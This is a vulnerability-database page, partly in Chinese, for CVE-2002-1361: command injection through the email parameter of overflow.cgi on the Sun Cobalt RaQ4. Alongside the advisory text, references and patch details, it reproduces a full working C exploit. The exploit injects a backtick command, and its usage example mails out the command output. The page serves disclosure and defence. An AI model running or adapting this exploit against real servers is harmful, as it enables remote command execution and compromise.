CVE-2002-1361
CVSS10.0
发布时间 :2002-12-23 00:00:00
修订时间 :2016-10-17 22:26:16
NMCOE    

[原文]overflow.cgi CGI script in Sun Cobalt RaQ 4 with the SHP (Security Hardening Patch) installed allows remote attackers to execute arbitrary code via a POST request with shell metacharacters in the email parameter.


[CNNVD]Cobalt RaQ4管理接口远程命令执行漏洞(CNNVD-200212-063)

        
        Cobalt RaQ是一个基于Internet的服务应用程序,由Sun微系统公司发布和维护。
        Cobalt RaQ WEB管理接口在处理用户提供的EMAIL参数时缺少正确过滤,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
        攻击者可以向Cobalt RaQ WEB管理接口中的CGI脚本的包含恶意EMAIL参数的请求,由于CGI脚本处理不充分,可导致以WEB进程权限在系统上执行任意指令。
        不过这个漏洞只存在安装了RaQ4加固安全包之后的RaQ4服务程序中。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1361
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1361
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-063
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=103912513522807&w=2
(UNKNOWN)  BUGTRAQ  20021205 Cobalt RaQ4 Remote root exploit
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/49377
(VENDOR_ADVISORY)  SUNALERT  49377
http://www.cert.org/advisories/CA-2002-35.html
(VENDOR_ADVISORY)  CERT  CA-2002-35
http://www.ciac.org/ciac/bulletins/n-025.shtml
(UNKNOWN)  CIAC  N-025
http://www.kb.cert.org/vuls/id/810921
(UNKNOWN)  CERT-VN  VU#810921
http://www.securityfocus.com/bid/6326
(UNKNOWN)  BID  6326
http://xforce.iss.net/xforce/xfdb/10776
(VENDOR_ADVISORY)  XF  cobalt-shp-overflow-privileges(10776)

- 漏洞信息

Cobalt RaQ4管理接口远程命令执行漏洞
危急 输入验证
2002-12-23 00:00:00 2006-08-28 00:00:00
远程  
        
        Cobalt RaQ是一个基于Internet的服务应用程序,由Sun微系统公司发布和维护。
        Cobalt RaQ WEB管理接口在处理用户提供的EMAIL参数时缺少正确过滤,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
        攻击者可以向Cobalt RaQ WEB管理接口中的CGI脚本的包含恶意EMAIL参数的请求,由于CGI脚本处理不充分,可导致以WEB进程权限在系统上执行任意指令。
        不过这个漏洞只存在安装了RaQ4加固安全包之后的RaQ4服务程序中。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时关闭WEB管理接口。
        厂商补丁:
        Cobalt
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-en-Security-2.0.1-SHP_REM.pkg

- 漏洞信息 (22072)

Cobalt RaQ4 Administrative Interface Command Execution Vulnerability (EDBID:22072)
linux remote
2002-12-05 Verified
0 grazer
N/A [点击下载]
source: http://www.securityfocus.com/bid/6326/info

The RaQ4 is a server appliance distributed and maintained by Sun Microsystems.

A vulnerability has been reported in the web administration interface of the RaQ4. It is possible for a remote attacker to execute commands. By passing malicious email parameter to the vulnerable CGI script, commands are carried out in the security context of the administration server.

This vulnerability only affects RaQ4 servers with the RaQ4 Security Hardening Package (SHP) installed. The SHP is not installed by default.

// RaQ 4 and possibly others easy remote root compromise
// due to a flaw in the Security Hardening package HEHE!
// Wouter ter Maat aka grazer - http://www.i-security.nl
 
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 81 /* default cobalt admin httpd  
                   try 444 if 81 runs with ssl */

// cmpstr
#define found "overflow" 
#define done "Starting"
#define exec "mail"

// prototypes
int banner();
int makereq(char *host, char *request, char *cmpstr, int port);

int main(int argc, char *argv[]) {
int retval, port;

char cmd[1024];
char cbuf[1024];
char request2[3096];

// evi1 requests
char request1[] = "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e"
                  "\x63\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f"
                  "\x77\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2e\x63\x67\x69"
                  "\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\n\x48\x6f\x73"
                  "\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\n\n\n";

char req_tmp[] = "\x50\x4f\x53\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e"
		 "\x63\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77"
		 "\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2e\x63\x67\x69\x20\x48"
		 "\x54\x54\x50\x2f\x31\x2e\x31\n\x41\x63\x63\x65\x70\x74\x3a\x20"
		 "\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20\x69\x6d\x61\x67"
		 "\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c\x20\x69\x6d"
		 "\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65"
		 "\x2f\x70\x6a\x70\x65\x67\x2c\x20\x2a\x2f\x2a\n\x41\x63\x63"
		 "\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x6e\x6c\n"
		 "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61"
		 "\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77"
		 "\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64"
		 "\x65\x64\n\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64"
		 "\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c"
		 "\x61\x74\x65\n\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20"
		 "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x3b\x29\n"
		 "\x48\x6f\x73\x74\x3a\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31"
		 "\x3a\x38\x31\n";

char request3[] = "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e\x63"
		  "\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2f"
		  "\x6f\x76\x65\x72\x66\x6c\x6f\x77\x54\x65\x73\x74\x45\x6d\x61"
	          "\x69\x6c\x2e\x63\x67\x69\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\n"
	          "\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\n\n\n";

sprintf(cmd, "%s%s%s", "enabled=1&email=`", argv[2], "`&page=overflow\n\n");
sprintf(cbuf, "%s %d %s", "Content-Length:", strlen(cmd)-2, "\n\n");
sprintf(request2, "%s%s%s", req_tmp, cbuf, cmd);

banner();

  while(argc < 3) {
    fprintf(stderr, " %s <host> <command> <port> \n", argv[0]);
    fprintf(stderr, " example: www.cobalt.com \"id|mail you@addy\" 444\n");
    fprintf(stderr, " default port is set to 81. \n\n");
    exit(0); }

if(argc==3) {
port = PORT; }
else { 
port = atoi(argv[3]); }

retval = makereq(argv[1], request1, found, port); 

if(retval==2) { 
  printf(" - name cannot be resolved!\n"); 
 exit(0); } if(retval==3) { 
  printf(" - connect: connection refused! d0h!\n");
 exit(0); }

if(retval==404) { 
  printf(" - this machine is not vulnerable, dweep!\n"); 
 exit(0); }
else { 
  printf(" + ow yeah, we've found a victim!\n"); } 


printf(" ++ Enabling stackguard and creating evil config file...\n");

retval = makereq(argv[1], request2, done, port); 

 if(retval==404) {
   printf(" -- attack failed , sorry! \n"); 
  exit(0);}
 else { 
   printf(" +++ config file written succesfully ! \n"); } 

 printf(" ++++ Let's get our evil command executed...\n");


retval = makereq(argv[1], request3, exec, port); 

if(retval==404) { 
  printf(" --- attack failed, sorry! \n"); 
 exit(0);} 
else { 
printf(" +++++ The command : \"%s\"\n +++++ has been run on the server.\n\n", argv[2]); }

}

int banner() { 
printf("*************************************************\n");
printf("RaQ 4 remote root exploit - grazer@digit-labs.org\n");
printf("Vulnerable : RaQ4 with Security Hardening Update.\n");
printf("             isn't it ironic? :]                 \n");
printf("*************************************************\n"); }

int makereq(char *host, char *request, char *cmpstr, int port) {

int fd, sock, chk;
char buf[2000];

struct sockaddr_in addr; 
struct hostent *lh;

if ((lh=gethostbyname(host)) == NULL){
             return 2; }

bzero(&(addr.sin_zero), 8);
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = *((struct in_addr *) lh-> h_addr);

fd = socket(AF_INET, SOCK_STREAM, 0);

if (connect(fd,(struct sockaddr *) &addr ,sizeof(addr)) != 0){
                return 3;
	}

send(fd, request, strlen(request), 0);
read(fd, buf, 500);
if(strstr(buf, cmpstr)!=0) { 
return 200; } else { 
return 404; }

close(fd);
return 1;
}
		

- 漏洞信息

8513
Cobalt RaQ4 Administrative Interface overflow.cgi Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

RaQ4 web administration interface contains a flaw that may allow a malicious user to execute commands. The problem is that the email parameter is not verified properly upon the submission of overflow.cgi and will allow an attacker to execute commands in the security context of the administration server. This vulnerability only affects RaQ4 servers with the RaQ4 Security Hardening Package (SHP) installed. The SHP is not installed by default

- 时间线

2002-12-05 2002-12-05
2002-12-05 Unknow

- 解决方案

Sun has fixed this issue with package RaQ4-en-Security-2.0.1-SHP_REM.pkg. It is also possible to correct the flaw by implementing the following workaround(s): disable the web administration interface if possible.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站